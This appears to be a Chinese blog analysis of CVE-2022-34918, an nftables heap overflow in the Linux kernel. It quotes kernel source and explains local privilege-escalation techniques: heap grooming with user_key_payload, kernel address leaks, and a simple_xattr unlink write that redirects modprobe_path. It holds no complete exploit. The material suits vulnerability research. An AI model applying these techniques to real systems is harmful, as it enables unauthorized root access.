CVE-2022-34918
196082 慢慢好起来

前言

这篇应该是关于nftables类型的最后一篇有写exp的文章,在后续的复现文章只会进行漏洞分析以及利用手法分析。

element简介

在介绍之前不得不先提起一下set集合了。在nftables中,集合算是实现map以及verdict map的重要基础,对于map就是大家熟知的键值对的形式,而verdict map其实也是简直对的形式不过其具有判决效果可以进行一系列操作例如:accept、drop、jump之类的。

nf_tables_newsetelem分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
static int nf_tables_newsetelem(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr *const nla[],
struct netlink_ext_ack *extack)
{
u8 genmask = nft_genmask_next(net);
const struct nlattr *attr;
struct nft_set *set;
struct nft_ctx ctx;
int rem, err;

if (nla[NFTA_SET_ELEM_LIST_ELEMENTS] == NULL)
return -EINVAL;

err = nft_ctx_init_from_elemattr(&ctx, net, skb, nlh, nla, extack,
genmask);
if (err < 0)
return err;

set = nft_set_lookup_global(net, ctx.table, nla[NFTA_SET_ELEM_LIST_SET],
nla[NFTA_SET_ELEM_LIST_SET_ID], genmask);
if (IS_ERR(set))
return PTR_ERR(set);

if (!list_empty(&set->bindings) && set->flags & NFT_SET_CONSTANT)
return -EBUSY;

nla_for_each_nested (attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
err = nft_add_set_elem(&ctx, set, attr, nlh->nlmsg_flags);
if (err < 0)
return err;
}

if (net->nft.validate_state == NFT_VALIDATE_DO)
return nft_table_validate(net, ctx.table);

return 0;
}

函数内首先调用nft_ctx_init_from_elemattr函数对ctx进行初始化。随后通过nft_set_lookup_global函数找到set。最后真正添加的函数为nft_add_set_elem

nft_add_set_elem分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{
// ......

err = nla_parse_nested_deprecated(nla, NFTA_SET_ELEM_MAX, attr,
nft_set_elem_policy, NULL);
if (err < 0)
return err;

if (nla[NFTA_SET_ELEM_KEY] == NULL)
return -EINVAL;

nft_set_ext_prepare(&tmpl);

err = nft_setelem_parse_flags(set, nla[NFTA_SET_ELEM_FLAGS], &flags);
if (err < 0)
return err;
if (flags != 0)
nft_set_ext_add(&tmpl, NFT_SET_EXT_FLAGS);

if (set->flags & NFT_SET_MAP) {
if (nla[NFTA_SET_ELEM_DATA] == NULL &&
!(flags & NFT_SET_ELEM_INTERVAL_END))
return -EINVAL;
} else {
if (nla[NFTA_SET_ELEM_DATA] != NULL)
return -EINVAL;
}

if ((flags & NFT_SET_ELEM_INTERVAL_END) &&
(nla[NFTA_SET_ELEM_DATA] || nla[NFTA_SET_ELEM_OBJREF] ||
nla[NFTA_SET_ELEM_TIMEOUT] || nla[NFTA_SET_ELEM_EXPIRATION] ||
nla[NFTA_SET_ELEM_USERDATA] || nla[NFTA_SET_ELEM_EXPR]))
return -EINVAL;

timeout = 0;
if (nla[NFTA_SET_ELEM_TIMEOUT] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_TIMEOUT],
&timeout);
if (err)
return err;
} else if (set->flags & NFT_SET_TIMEOUT) {
timeout = set->timeout;
}

expiration = 0;
if (nla[NFTA_SET_ELEM_EXPIRATION] != NULL) {
if (!(set->flags & NFT_SET_TIMEOUT))
return -EINVAL;
err = nf_msecs_to_jiffies64(nla[NFTA_SET_ELEM_EXPIRATION],
&expiration);
if (err)
return err;
}

if (nla[NFTA_SET_ELEM_EXPR] != NULL) {
expr = nft_set_elem_expr_alloc(ctx, set,
nla[NFTA_SET_ELEM_EXPR]);
if (IS_ERR(expr))
return PTR_ERR(expr);

err = -EOPNOTSUPP;
if (set->expr && set->expr->ops != expr->ops)
goto err_set_elem_expr;
} else if (set->expr) {
expr = kzalloc(set->expr->ops->size, GFP_KERNEL);
if (!expr)
return -ENOMEM;

err = nft_expr_clone(expr, set->expr);
if (err < 0)
goto err_set_elem_expr;
}

err = nft_setelem_parse_key(ctx, set, &elem.key.val,
nla[NFTA_SET_ELEM_KEY]);
if (err < 0)
goto err_set_elem_expr;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY, set->klen);

if (nla[NFTA_SET_ELEM_KEY_END]) {
err = nft_setelem_parse_key(ctx, set, &elem.key_end.val,
nla[NFTA_SET_ELEM_KEY_END]);
if (err < 0)
goto err_parse_key;

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_KEY_END, set->klen);
}

if (timeout > 0) {
nft_set_ext_add(&tmpl, NFT_SET_EXT_EXPIRATION);
if (timeout != set->timeout)
nft_set_ext_add(&tmpl, NFT_SET_EXT_TIMEOUT);
}

if (expr)
nft_set_ext_add_length(&tmpl, NFT_SET_EXT_EXPR,
expr->ops->size);

if (nla[NFTA_SET_ELEM_OBJREF] != NULL) {
if (!(set->flags & NFT_SET_OBJECT)) {
err = -EINVAL;
goto err_parse_key_end;
}
obj = nft_obj_lookup(ctx->net, ctx->table,
nla[NFTA_SET_ELEM_OBJREF], set->objtype,
genmask);
if (IS_ERR(obj)) {
err = PTR_ERR(obj);
goto err_parse_key_end;
}
nft_set_ext_add(&tmpl, NFT_SET_EXT_OBJREF);
}

if (nla[NFTA_SET_ELEM_DATA] != NULL) {
err = nft_setelem_parse_data(ctx, set, &desc, &elem.data.val,
nla[NFTA_SET_ELEM_DATA]);
if (err < 0)
goto err_parse_key_end;

dreg = nft_type_to_reg(set->dtype);
list_for_each_entry (binding, &set->bindings, list) {
struct nft_ctx bind_ctx = {
.net = ctx->net,
.family = ctx->family,
.table = ctx->table,
.chain = (struct nft_chain *)binding->chain,
};

if (!(binding->flags & NFT_SET_MAP))
continue;

err = nft_validate_register_store(&bind_ctx, dreg,
&elem.data.val,
desc.type, desc.len);
if (err < 0)
goto err_parse_data;

if (desc.type == NFT_DATA_VERDICT &&
(elem.data.val.verdict.code == NFT_GOTO ||
elem.data.val.verdict.code == NFT_JUMP))
nft_validate_state_update(ctx->net,
NFT_VALIDATE_NEED);
}

nft_set_ext_add_length(&tmpl, NFT_SET_EXT_DATA, desc.len);
}

/* The full maximum length of userdata can exceed the maximum
* offset value (U8_MAX) for following extensions, therefor it
* must be the last extension added.
*/
ulen = 0;
if (nla[NFTA_SET_ELEM_USERDATA] != NULL) {
ulen = nla_len(nla[NFTA_SET_ELEM_USERDATA]);
if (ulen > 0)
nft_set_ext_add_length(&tmpl, NFT_SET_EXT_USERDATA,
ulen);
}

err = -ENOMEM;
elem.priv = nft_set_elem_init(set, &tmpl, elem.key.val.data,
elem.key_end.val.data, elem.data.val.data,
timeout, expiration, GFP_KERNEL);
if (elem.priv == NULL)
goto err_parse_data;

ext = nft_set_elem_ext(set, elem.priv);
if (flags)
*nft_set_ext_flags(ext) = flags;
if (ulen > 0) {
udata = nft_set_ext_userdata(ext);
udata->len = ulen - 1;
nla_memcpy(&udata->data, nla[NFTA_SET_ELEM_USERDATA], ulen);
}
if (obj) {
*nft_set_ext_obj(ext) = obj;
obj->use++;
}
if (expr) {
memcpy(nft_set_ext_expr(ext), expr, expr->ops->size);
kfree(expr);
expr = NULL;
}

trans = nft_trans_elem_alloc(ctx, NFT_MSG_NEWSETELEM, set);
if (trans == NULL)
goto err_trans;

ext->genmask = nft_genmask_cur(ctx->net) | NFT_SET_ELEM_BUSY_MASK;
err = set->ops->insert(ctx->net, set, &elem, &ext2);
}

首先判断是否存在key,接着调用nft_set_ext_prepare初始化tmpl

1
2
3
4
5
6
7
8
9
10
struct nft_set_ext_tmpl {
u16 len;
u8 offset[NFT_SET_EXT_NUM];
};

static inline void nft_set_ext_prepare(struct nft_set_ext_tmpl *tmpl)
{
memset(tmpl, 0, sizeof(*tmpl));
tmpl->len = sizeof(struct nft_set_ext);
}

接着通过nft_setelem_parse_flags拿到用户传入的flag,并且通过nft_set_ext_add函数给tmpl添加flag对应的长度。

1
2
3
4
5
6
7
8
9
10
11
12
13
static inline void nft_set_ext_add_length(struct nft_set_ext_tmpl *tmpl, u8 id,
unsigned int len)
{
tmpl->len = ALIGN(tmpl->len, nft_set_ext_types[id].align);
BUG_ON(tmpl->len > U8_MAX);
tmpl->offset[id] = tmpl->len;
tmpl->len += nft_set_ext_types[id].len + len;
}

static inline void nft_set_ext_add(struct nft_set_ext_tmpl *tmpl, u8 id)
{
nft_set_ext_add_length(tmpl, id, 0);
}

随后对set的类型进行判断以及对用户是否输入对应的值进行判断。

后面是对timeout和expiration进行设置。

然后如果需要创建expr则会生成expr,如果用户没有指定并且set存在expr则会直接clone一个。

下面就是比较重要的调用nft_setelem_parse_key函数解析用户传入的key。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
int nft_data_init(const struct nft_ctx *ctx, struct nft_data *data,
unsigned int size, struct nft_data_desc *desc,
const struct nlattr *nla)
{
struct nlattr *tb[NFTA_DATA_MAX + 1];
int err;

err = nla_parse_nested_deprecated(tb, NFTA_DATA_MAX, nla,
nft_data_policy, NULL);
if (err < 0)
return err;

if (tb[NFTA_DATA_VALUE])
return nft_value_init(ctx, data, size, desc,
tb[NFTA_DATA_VALUE]);
if (tb[NFTA_DATA_VERDICT] && ctx != NULL)
return nft_verdict_init(ctx, data, desc, tb[NFTA_DATA_VERDICT]);
return -EINVAL;
}
EXPORT_SYMBOL_GPL(nft_data_init);

static int nft_setelem_parse_key(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data *key, struct nlattr *attr)
{
struct nft_data_desc desc;
int err;

err = nft_data_init(ctx, key, NFT_DATA_VALUE_MAXLEN, &desc, attr);
if (err < 0)
return err;

if (desc.type != NFT_DATA_VALUE || desc.len != set->klen) {
nft_data_release(key, desc.type);
return -EINVAL;
}

return 0;
}

这里面主要是调用了nft_data_init函数,而其内部就是我们较为熟悉的nla_parse_nested_deprecated最终会将attr中的内容放入到eb中,后根据不同的类型进入到下方不同的函数中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int nft_value_init(const struct nft_ctx *ctx, struct nft_data *data,
unsigned int size, struct nft_data_desc *desc,
const struct nlattr *nla)
{
unsigned int len;

len = nla_len(nla);
if (len == 0)
return -EINVAL;
if (len > size)
return -EOVERFLOW;

nla_memcpy(data->data, nla, len);
desc->type = NFT_DATA_VALUE;
desc->len = len;
return 0;
}

这里以NFTA_DATA_VALUE为例,其目的就是将tb中的内容写到key中,并设置desc的类型与长度,出来之后判断其类型是否为NFTA_DATA_VALUE以及长度是否和set->klen一致。

在完成对传入的key的解析之后会调用nft_set_ext_add_length函数维持tmpl。

再往后又是继续分析NFTA_SET_ELEM_DATA中的内容,并写入到&elem.data.val

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data, struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr);
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) {
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

在完成上述对传入的内容检测以及解析之后会调用nft_set_elem_init对element进行初始化。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl, const u32 *key,
const u32 *key_end, const u32 *data, u64 timeout,
u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}

这里首先通过申请set->ops->elemsize + tmpl->len大小的堆块。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
static inline void *nft_set_ext(const struct nft_set_ext *ext, u8 id)
{
return (void *)ext + ext->offset[id];
}

static inline struct nft_data *nft_set_ext_key(const struct nft_set_ext *ext)
{
return nft_set_ext(ext, NFT_SET_EXT_KEY);
}

static inline struct nft_data *nft_set_ext_key_end(const struct nft_set_ext *ext)
{
return nft_set_ext(ext, NFT_SET_EXT_KEY_END);
}

static inline struct nft_data *nft_set_ext_data(const struct nft_set_ext *ext)
{
return nft_set_ext(ext, NFT_SET_EXT_DATA);
}

static inline struct nft_set_ext *nft_set_elem_ext(const struct nft_set *set,
void *elem)
{
return elem + set->ops->elemsize;
}

然后通过nft_set_elem_ext函数拿到ext,随后直接调用对应的函数取出偏移通过下面的memcpy向内部写入前面解析出来的内容。

后面就是把前面的expr,obj之类的也给一并写入到ext中。

上述就是申请element的总体逻辑,可以看出来的这里tmpl的作用是记录数据大小以及其对应的偏移。

漏洞分析

这里浅浅来一个前情提要,在上一篇文章中,nftables子系统浅分析分析了set的申请过程,在nf_tables_newset函数中,会对set的成员进行赋值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// ......
INIT_LIST_HEAD(&set->bindings);
set->table = table;
write_pnet(&set->net, net);
set->ops = ops;
set->ktype = ktype;
set->klen = desc.klen;
set->dtype = dtype;
set->objtype = objtype;
set->dlen = desc.dlen;
set->expr = expr;
set->flags = flags;
set->size = desc.size;
set->policy = policy;
set->udlen = udlen;
set->udata = udata;
set->timeout = timeout;
set->gc_int = gc_int;
set->handle = nf_tables_alloc_handle(table);

set->field_count = desc.field_count;
// ......

这里就可以看到熟悉的set->dlen,可以看到其是由desc.len赋值的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
// ......
dtype = 0;
if (nla[NFTA_SET_DATA_TYPE] != NULL) {
if (!(flags & NFT_SET_MAP))
return -EINVAL;

dtype = ntohl(nla_get_be32(nla[NFTA_SET_DATA_TYPE]));
if ((dtype & NFT_DATA_RESERVED_MASK) == NFT_DATA_RESERVED_MASK &&
dtype != NFT_DATA_VERDICT)
return -EINVAL;

if (dtype != NFT_DATA_VERDICT) {
if (nla[NFTA_SET_DATA_LEN] == NULL)
return -EINVAL;
desc.dlen = ntohl(nla_get_be32(nla[NFTA_SET_DATA_LEN]));
if (desc.dlen == 0 || desc.dlen > NFT_DATA_VALUE_MAXLEN)
return -EINVAL;
} else
desc.dlen = sizeof(struct nft_verdict);
} else if (flags & NFT_SET_MAP)
return -EINVAL;
// ......

可以看到这里的desc.dlen是直接由用户传入的。

漏洞原理

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
static int nft_setelem_parse_data(struct nft_ctx *ctx, struct nft_set *set,
struct nft_data_desc *desc,
struct nft_data *data, struct nlattr *attr)
{
int err;

err = nft_data_init(ctx, data, NFT_DATA_VALUE_MAXLEN, desc, attr);
if (err < 0)
return err;

if (desc->type != NFT_DATA_VERDICT && desc->len != set->dlen) {
nft_data_release(data, desc->type);
return -EINVAL;
}

return 0;
}

可以看到在解析value的时候,在最后判断会因为类型是NFT_DATA_VERDICT而不会进入到后面的判段,也就是这里的desc->lenset->dlen是可以不一致的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
void *nft_set_elem_init(const struct nft_set *set,
const struct nft_set_ext_tmpl *tmpl, const u32 *key,
const u32 *key_end, const u32 *data, u64 timeout,
u64 expiration, gfp_t gfp)
{
struct nft_set_ext *ext;
void *elem;

elem = kzalloc(set->ops->elemsize + tmpl->len, gfp);
if (elem == NULL)
return NULL;

ext = nft_set_elem_ext(set, elem);
nft_set_ext_init(ext, tmpl);

memcpy(nft_set_ext_key(ext), key, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_KEY_END))
memcpy(nft_set_ext_key_end(ext), key_end, set->klen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_DATA))
memcpy(nft_set_ext_data(ext), data, set->dlen);
if (nft_set_ext_exists(ext, NFT_SET_EXT_EXPIRATION)) {
*nft_set_ext_expiration(ext) = get_jiffies_64() + expiration;
if (expiration == 0)
*nft_set_ext_expiration(ext) += timeout;
}
if (nft_set_ext_exists(ext, NFT_SET_EXT_TIMEOUT))
*nft_set_ext_timeout(ext) = timeout;

return elem;
}

desc->lenset->dlen不一致的情况下,在这里的memcpy就会出现意想不到的效果。

如果在申请set时我们控制set->dlen小于NFT_DATA_VALUE_MAXLEN并在申请element时控制data的长度小于set->dlen那么在上面初始化element的时候则会发生堆溢出。

漏洞利用

前面已经分析出了漏洞的表现形式,目前所遇到的问题是我们没法直接控制溢出后的内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
static int nf_tables_newsetelem(struct net *net, struct sock *nlsk,
struct sk_buff *skb, const struct nlmsghdr *nlh,
const struct nlattr *const nla[],
struct netlink_ext_ack *extack)
{
// ......

nla_for_each_nested (attr, nla[NFTA_SET_ELEM_LIST_ELEMENTS], rem) {
err = nft_add_set_elem(&ctx, set, attr, nlh->nlmsg_flags);
if (err < 0)
return err;
}

// ......
}

这里回过头看申请element的回调函数,可以注意到的是,在面对nal中存在多个element时是通过for循环调用nft_add_set_elem申请的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
static int nft_add_set_elem(struct nft_ctx *ctx, struct nft_set *set,
const struct nlattr *attr, u32 nlmsg_flags)
{
struct nlattr *nla[NFTA_SET_ELEM_MAX + 1];
u8 genmask = nft_genmask_next(ctx->net);
struct nft_set_ext_tmpl tmpl;
struct nft_set_ext *ext, *ext2;
struct nft_set_elem elem;
struct nft_set_binding *binding;
struct nft_object *obj = NULL;
struct nft_expr *expr = NULL;
struct nft_userdata *udata;
struct nft_data_desc desc;
enum nft_registers dreg;
struct nft_trans *trans;
u32 flags = 0;
u64 timeout;
u64 expiration;
u8 ulen;
int err;

// ......

return 0;

err_set_full:
set->ops->remove(ctx->net, set, &elem);
err_element_clash:
kfree(trans);
err_trans:
if (obj)
obj->use--;

nf_tables_set_elem_destroy(ctx, set, elem.priv);
err_parse_data:
if (nla[NFTA_SET_ELEM_DATA] != NULL)
nft_data_release(&elem.data.val, desc.type);
err_parse_key_end:
nft_data_release(&elem.key_end.val, NFT_DATA_VALUE);
err_parse_key:
nft_data_release(&elem.key.val, NFT_DATA_VALUE);
err_set_elem_expr:
if (expr != NULL)
nft_expr_destroy(ctx, expr);

return err;
}

nft_add_set_elem函数对变量的定义可以看到其对elem的定义是定义在栈上的,并且在中途不出现问题的情况下是直接通过return 0进行返回的,这也就意味着该函数栈上的内容是未经过修改的并且也没有初始化,也就意味着可以通过申请两个element来控制第二次写入时的内容。

利用手法分析

这里的利用手法很多,因为很久没玩内核的缘故为了能够与时俱进一点所以这里就都给分析一遍的好。

leak手法

首先这里先简单介绍一下leak手法,因为上面的在nft_add_set_elem的限制导致在为elem申请堆块时只能从kmalloc-64、kmalloc-128、kmalloc-192中申请。

这里最多可以溢出的字节数为48所以从目前来看我们熟悉的struct msg_msg结构体是可以使用的,不过可惜的是这里申请elem的所使用的标识为GFP_KERNEL,考虑到容易出现堆隔离无奈放弃。

最终这里选择使用见面次数不多的user_key_payload结构体来进行leak。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
int user_preparse(struct key_preparsed_payload *prep)
{
struct user_key_payload *upayload;
size_t datalen = prep->datalen;

if (datalen <= 0 || datalen > 32767 || !prep->data)
return -EINVAL;

upayload = kmalloc(sizeof(*upayload) + datalen, GFP_KERNEL);
if (!upayload)
return -ENOMEM;

/* attach the data */
prep->quotalen = datalen;
prep->payload.data[0] = upayload;
upayload->datalen = datalen;
memcpy(upayload->data, prep->data, datalen);
return 0;
}
EXPORT_SYMBOL_GPL(user_preparse);

這是其申請過程,可以看到其標識位爲GFP_KERNEL,並且其申請大小是用戶可控的。

1
2
3
4
5
struct user_key_payload {
struct rcu_head rcu; /* RCU destructor */
unsigned short datalen; /* length of this data */
char data[] __aligned(__alignof__(u64)); /* actual data */
};

觀察其結構體可以發現其類似於msg_msg也是有datalen來控制其長度的。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
long user_read(const struct key *key, char *buffer, size_t buflen)
{
const struct user_key_payload *upayload;
long ret;

upayload = user_key_payload_locked(key);
ret = upayload->datalen;

/* we can return the data as is */
if (buffer && buflen > 0) {
if (buflen > upayload->datalen)
buflen = upayload->datalen;

memcpy(buffer, upayload->data, buflen);
}

return ret;
}

所以如果我們可以修改掉user_key_payload->datalen即可實現越界讀取。

這裏關於泄露什麼內容存在兩種不同的門派。

第一種是通過在io_uring_setup设置io_uring上下文时会创建percpu_ref_data结构体,其大小为56正好会在上面的kmalloc-64中申请堆块并且申请的标识位为GFP_KERNEL。这种方法的做法就是同时申请user_key_payloadpercpu_ref_data结构体,那么极可能存在两个结构体相邻的情况,此时如果申请的elem紧邻与user_key_payload即可通过修改其datalen成员达到越界读取的效果。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
int percpu_ref_init(struct percpu_ref *ref, percpu_ref_func_t *release,
unsigned int flags, gfp_t gfp)
{
size_t align = max_t(size_t, 1 << __PERCPU_REF_FLAG_BITS,
__alignof__(unsigned long));
unsigned long start_count = 0;
struct percpu_ref_data *data;

ref->percpu_count_ptr = (unsigned long)
__alloc_percpu_gfp(sizeof(unsigned long), align, gfp);
if (!ref->percpu_count_ptr)
return -ENOMEM;

data = kzalloc(sizeof(*ref->data), gfp);
if (!data) {
free_percpu((void __percpu *)ref->percpu_count_ptr);
ref->percpu_count_ptr = 0;
return -ENOMEM;
}

data->force_atomic = flags & PERCPU_REF_INIT_ATOMIC;
data->allow_reinit = flags & PERCPU_REF_ALLOW_REINIT;

// ......

data->release = release;
data->confirm_switch = NULL;
data->ref = ref;
ref->data = data;
return 0;
}
EXPORT_SYMBOL_GPL(percpu_ref_init);

通过对percpu_ref_data的初始化函数可以看到这里会给其release成员赋值release函数,以及会给ref成员赋值ref。

1
2
3
if (percpu_ref_init(&ctx->refs, io_ring_ctx_ref_free,
PERCPU_REF_ALLOW_REINIT, GFP_KERNEL))
goto err;

因为在调用时传入的ref是上述形式,所以这里传入的ref其实是ctx结构体refs成员的偏移地址,也就是依旧落在ctx堆块上。

(因为在5.10低版本不存在io_uring所以上述代码使用的是5.19)

第二种leak方式则是利用user_key_payload的rcu成员。

1
2
3
4
5
struct callback_head {
struct callback_head *next;
void (*func)(struct callback_head *head);
} __attribute__((aligned(sizeof(void *))));
#define rcu_head callback_head

可以看到這裏存在一個func指針,他是在被撤銷時纔會被賦值。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
void user_revoke(struct key *key)
{
struct user_key_payload *upayload = user_key_payload_locked(key);

/* clear the quota */
key_payload_reserve(key, 0);

if (upayload) {
rcu_assign_keypointer(key, NULL);
call_rcu(&upayload->rcu, user_free_payload_rcu);
}
}

EXPORT_SYMBOL(user_revoke);

這裏會調用call_rcu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
static void
__call_rcu(struct rcu_head *head, rcu_callback_t func)
{
unsigned long flags;
struct rcu_data *rdp;
bool was_alldone;

/* Misaligned rcu_head! */
WARN_ON_ONCE((unsigned long)head & (sizeof(void *) - 1));

if (debug_rcu_head_queue(head)) {
/*
* Probable double call_rcu(), so leak the callback.
* Use rcu:rcu_callback trace event to find the previous
* time callback was passed to __call_rcu().
*/
WARN_ONCE(1, "__call_rcu(): Double-freed CB %p->%pS()!!!\n",
head, head->func);
WRITE_ONCE(head->func, rcu_leak_callback);
return;
}
head->func = func;
head->next = NULL;
local_irq_save(flags);
kasan_record_aux_stack(head);
rdp = this_cpu_ptr(&rcu_data);

/* Add the callback to our list. */
if (unlikely(!rcu_segcblist_is_enabled(&rdp->cblist))) {
// This can trigger due to call_rcu() from offline CPU:
WARN_ON_ONCE(rcu_scheduler_active != RCU_SCHEDULER_INACTIVE);
WARN_ON_ONCE(!rcu_is_watching());
// Very early boot, before rcu_init(). Initialize if needed
// and then drop through to queue the callback.
if (rcu_segcblist_empty(&rdp->cblist))
rcu_segcblist_init(&rdp->cblist);
}

check_cb_ovld(rdp);
if (rcu_nocb_try_bypass(rdp, head, &was_alldone, flags))
return; // Enqueued onto ->nocb_bypass, so just leave.
// If no-CBs CPU gets here, rcu_nocb_try_bypass() acquired ->nocb_lock.
rcu_segcblist_enqueue(&rdp->cblist, head);
if (__is_kvfree_rcu_offset((unsigned long)func))
trace_rcu_kvfree_callback(rcu_state.name, head,
(unsigned long)func,
rcu_segcblist_n_cbs(&rdp->cblist));
else
trace_rcu_callback(rcu_state.name, head,
rcu_segcblist_n_cbs(&rdp->cblist));

/* Go handle any RCU core processing required. */
if (IS_ENABLED(CONFIG_RCU_NOCB_CPU) &&
unlikely(rcu_segcblist_is_offloaded(&rdp->cblist))) {
__call_rcu_nocb_wake(rdp, was_alldone, flags); /* unlocks */
} else {
__call_rcu_core(rdp, head, flags);
local_irq_restore(flags);
}
}

void call_rcu(struct rcu_head *head, rcu_callback_t func)
{
__call_rcu(head, func);
}
EXPORT_SYMBOL_GPL(call_rcu);

可以看到這裏纔會對func成員賦值user_free_payload_rcu函數地址,並且總所周知的是rcu並不會直接執行回調函數,會先加入到隊列中,等到所有的reader都離開了寬限期之後才能夠將舊的給釋放掉,所以我們可以直接趁此時間利用溢出的user_key_payload去越界讀取下面的內容。

CVE-2022-34918-LPE-PoC中最终get root shell的方式是通过修改modprobe_path达成的,其任意地址写的手段是利用list_del函数存在unlink操作

1
2
3
4
5
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
next->prev = prev;
WRITE_ONCE(prev->next, next);
}

这里只需要将/proc/目录修改为/tmp/即可,这样来就可以修改其目标文件了。所以我们只需要修改next低位为0x2f706d74并且prev为modprobe_path + 1即可实现修改目录为/tmp/目录的目的,不过这里的next必须为有效的地址,因为也对next做了写操作。

physmap 是内核虚拟内存的一个区域,物理内存页在其中连续映射。例如,如果机器有 4GiB(2^32 字节)内存,则需要 32 位(4 字节)来寻址系统中可用的物理内存的每个字节。假设 physmap 从 0xffffffff00000000 开始,从 0xffffffff00000000 到 0xffffffffffffffff 的任何地址都将有效,因为低 4 个字节的每个值(从 0x00000000-0xffffffff)都需要寻址内存。因此,假设系统至少有 4GiB 内存,攻击者可以为prev的低 4 字节选择任何值,只要高 4 字节对应于 physmap 地址即可。

所以next的取值就很清晰了,也就是physmap + 0x2f706d74

这里用于实现上述操作的结构体选择的是simple_xattr

1
2
3
4
5
6
struct simple_xattr {
struct list_head list;
char *name;
size_t size;
char value[];
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
struct simple_xattr *simple_xattr_alloc(const void *value, size_t size)
{
struct simple_xattr *new_xattr;
size_t len;

/* wrap around? */
len = sizeof(*new_xattr) + size;
if (len < sizeof(*new_xattr))
return NULL;

new_xattr = kvmalloc(len, GFP_KERNEL);
if (!new_xattr)
return NULL;

new_xattr->size = size;
memcpy(new_xattr->value, value, size);
return new_xattr;
}

上述是关于simple_xattr的生成函数,可以看到其长度主要有结构体大小以及指定的value大小决定,并且其申请的标志位为GFP_KERNEL所以算是这一利用手法的最佳选择。

然后这里exp中存在一个小小的trick,因为simple_xattr是通过name进行索引的,所以这里可以直接通过溢出修改name的最后一个字节,因为前面可以看到的是name是一个char类型的指针,所以其末尾一定为0所以修改为一定偏移,那么就可以通过修改后的字符串进行索引可以直接找到被我们溢出修改掉的simple_xattr结构体。

因为我这里采用的是5.10的内核版本所以就不写上面的exp了

USMA

在以往我们简单介绍过usma,当时采用的是直接修改页表的方式来对代码段进行修改,并且在那里我们使用了packet socket模块来构建页级堆风水,不过这次在这里我们可以直接使用它来完成usma。

